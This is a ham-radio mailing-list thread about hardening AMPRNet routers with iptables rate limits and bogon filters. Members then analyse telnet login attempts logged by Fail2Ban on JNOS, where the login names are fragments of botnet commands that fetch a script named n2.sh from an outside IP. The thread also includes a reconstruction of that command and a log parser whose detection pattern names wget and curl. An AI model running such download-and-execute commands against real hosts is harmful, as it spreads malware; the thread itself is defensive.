Pedro,
I use the following iptables rules on my router (this will work for any console-based connection using TCP):
# DROPS MULTIPLE SSH CONNECTIONS FROM SAME IP
iptables -t filter -I FORWARD -p tcp --syn --dport 22 -i tunl0 -m connlimit --connlimit-above 5 -j DROP

# DROPS MULTIPLE SSH ATTEMPTS FROM SAME IP WITHIN FIVE MINUTES
iptables -t filter -I FORWARD -p tcp --dport 22 -i tunl0 -m state --state NEW -m recent --name sshconnect --update --seconds 300 --hitcount 5 -j DROP
iptables -t filter -I FORWARD -p tcp --dport 22 -i tunl0 -m state --state NEW -m recent --name sshconnect --set
The first rule drops any connections greater than five. The last two rules mark and drop more than five attempts from the same IP, for a period of five minutes. You may wish to increase the time frame. I've also added rules to block IPs that attempt to connect (or portscan) on certain TCP and UDP ports (3389/tcp, 123/udp and 161/udp are common, for example) for which I do not post services as available to the AMPR Community or the Public Internet connection.
In essence, even if an unauthorized person discovered the port without being firewalled by the portscan rule, they only get 5 chances, with up to 5 concurrent connections at any given 5 minute interval (the number of attempts varies by implementation of server and client; but once portscanned or disconnected from a given series of attempts, it counts as one connection). Each reattempt after 5 restarts the 5 minute clock.
I also block Bogon IP addresses from entering tunl0:
# DROPS BOGONS ENTERING AMPRNet
# SEE http://www.team-cymru.org/Services/Bogons/bogon-bn-nonagg.txt
iptables -t raw -I PREROUTING -s 0.0.0.0/8 -i tunl0 -j DROP
iptables -t raw -I PREROUTING -s 10.0.0.0/8 -i tunl0 -j DROP
iptables -t raw -I PREROUTING -s 100.64.0.0/10 -i tunl0 -j DROP
iptables -t raw -I PREROUTING -s 127.0.0.0/8 -i tunl0 -j DROP
iptables -t raw -I PREROUTING -s 169.254.0.0/16 -i tunl0 -j DROP
iptables -t raw -I PREROUTING -s 172.16.0.0/12 -i tunl0 -j DROP
iptables -t raw -I PREROUTING -s 192.0.0.0/24 -i tunl0 -j DROP
iptables -t raw -I PREROUTING -s 192.0.2.0/24 -i tunl0 -j DROP
iptables -t raw -I PREROUTING -s 192.168.0.0/16 -i tunl0 -j DROP
iptables -t raw -I PREROUTING -s 198.18.0.0/15 -i tunl0 -j DROP
iptables -t raw -I PREROUTING -s 198.51.100.0/24 -i tunl0 -j DROP
iptables -t raw -I PREROUTING -s 203.0.113.0/24 -i tunl0 -j DROP
iptables -t raw -I PREROUTING -s 224.0.0.0/4 -i tunl0 -j DROP
iptables -t raw -I PREROUTING -s 240.0.0.0/4 -i tunl0 -j DROP
I should note that in addition to this, console-based connections that I use for administration only are moved to non-standard ports. So I added another layer of protection with Security Through Obscurity (hence a portscan rule).
73,
Lynwood KB3VWG
For those who monitor their logs, I've seen a spike in hack attempts to login to my JNOS via telnet, only there is something odd regarding the username they're using when trying to login.
I'm using Fail2Ban in combination with Shorewall, and my Fail2Ban jail rule caught these.
(Note the odd login names used in parentheses below.)
=======================
[Fail2Ban] jnos: banned 124.107.194.191
Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (root) bad login
Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (46.183.217.145 -c ge) bad login

[Fail2Ban] jnos: banned 119.93.93.191
Mon Jun 13 15:18:40 2016 119.93.93.191:43376 - MBOX (root) bad login
Mon Jun 13 15:18:41 2016 119.93.93.191:43376 - MBOX (46.183.217.145 -c ge) bad login

[Fail2Ban] jnos: banned 181.120.124.254
Tue Jun 14 15:26:20 2016 181.120.124.254:3982 - MBOX (root) bad login
Tue Jun 14 15:26:26 2016 181.120.124.254:3982 - MBOX (n2.sh -g 185.103.109) bad login

[Fail2Ban] jnos: banned 119.92.147.216
Tue Jun 14 16:46:50 2016 119.92.147.216:49692 - MBOX (root) bad login
Tue Jun 14 16:47:00 2016 119.92.147.216:49692 - MBOX (echo -e 'teot') bad login

[Fail2Ban] jnos: banned 119.93.93.103
Tue Jun 14 19:44:39 2016 119.93.93.103:50702 - MBOX (root) bad login
Tue Jun 14 19:44:43 2016 119.93.93.103:50702 - MBOX (08.67.1.175 -c get t) bad login
==========================
Anyone know what exploit someone is trying to probe for when using a login name like "n2.sh -g 185.103.109" ??
Just curious if anyone knows the exact intent of what they're trying to exploit so I can research and reinforce as needed.
I suspect this is happening 44 system wide to those with telnet options.
Bill Lewis - KG6BAJ
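A small parser for the JNOS "MBOX (...) bad login" lines quoted above, added here as an example and not part of Bill's post or of JNOS/Fail2Ban. It pulls out source IP, port and the attempted login name, flags names that look like command fragments rather than usernames (whitespace, option flags, embedded IP addresses, shell tokens), and groups attempts per source address so a log watcher can spot this pattern. The sample log is copied from the post; the heuristics are my own assumptions.

```python
import re
from collections import defaultdict

# Log line format as it appears in the post above (JNOS MBOX "bad login" lines).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) - MBOX \((?P<login>.*)\) bad login$"
)

# Assumed heuristics for a "login name" that is really a command fragment:
# whitespace, option flags, an embedded IPv4 address, or shell-ish tokens.
SUSPICIOUS = [
    re.compile(r"\s"),
    re.compile(r"(?:^|\s)-[a-z]"),
    re.compile(r"\d{1,3}(?:\.\d{1,3}){2,3}"),
    re.compile(r"\.sh\b|\becho\b|\bget\b|\bwget\b|\bcurl\b|[;&|`$']"),
]

def parse_line(line):
    """Return a dict for a bad-login line, or None for any other line (e.g. Fail2Ban ban notices)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    rec["suspicious"] = any(p.search(rec["login"]) for p in SUSPICIOUS)
    return rec

def summarize(lines):
    """Group bad logins by source IP and list the login names that look like command fragments."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)
    return {
        ip: {
            "attempts": len(recs),
            "logins": [r["login"] for r in recs],
            "command_like": [r["login"] for r in recs if r["suspicious"]],
        }
        for ip, recs in by_ip.items()
    }

# Sample lines copied from the post above; the "[Fail2Ban] ... banned" lines are skipped by the parser.
SAMPLE_LOG = """\
[Fail2Ban] jnos: banned 124.107.194.191
Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (root) bad login
Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (46.183.217.145 -c ge) bad login
Tue Jun 14 15:26:20 2016 181.120.124.254:3982 - MBOX (root) bad login
Tue Jun 14 15:26:26 2016 181.120.124.254:3982 - MBOX (n2.sh -g 185.103.109) bad login
Tue Jun 14 16:47:00 2016 119.92.147.216:49692 - MBOX (echo -e 'teot') bad login
""".splitlines()

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(ip, info)
```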
Bill,
First, I noticed:
- All the source IP addresses are allocated to ISPs in the Philippines
- Piecing the information together, I get something more like:

# get 46.183.217.145 -c n2.sh
# n2.sh -g 185.103.109<THIS OCTET IS MISSING FROM THE COMMENTS>
# echo -e 'teot'
CHECK THAT YOU DO NOT FIND A FILE NAMED n2.sh ON YOUR SYSTEM!?!?
I surmise the malicious person is:
- attempting to run 'get' and other commands on your local host;
- and/or trying to send commands through your host to a 3rd compromised system
When did you begin running fail2ban and firewalls, for a while, or recently?
73,
- Lynwood KB3VWG
Bill,
Also 46.183.217.145 is in Latvia. It is a webserver; but n2.sh is no longer present.
- KB3VWG
Bill et al;
On Tue, 2016-06-14 at 23:06 -0700, William Lewis wrote:
[Fail2Ban] jnos: banned 124.107.194.191
Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (root) bad login
Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (46.183.217.145 -c ge) bad login
I don't know if Maiko has a limit as to his login but it almost appears to me as if the botnets are trying to execute a longer command. A search on n2.sh comes up empty.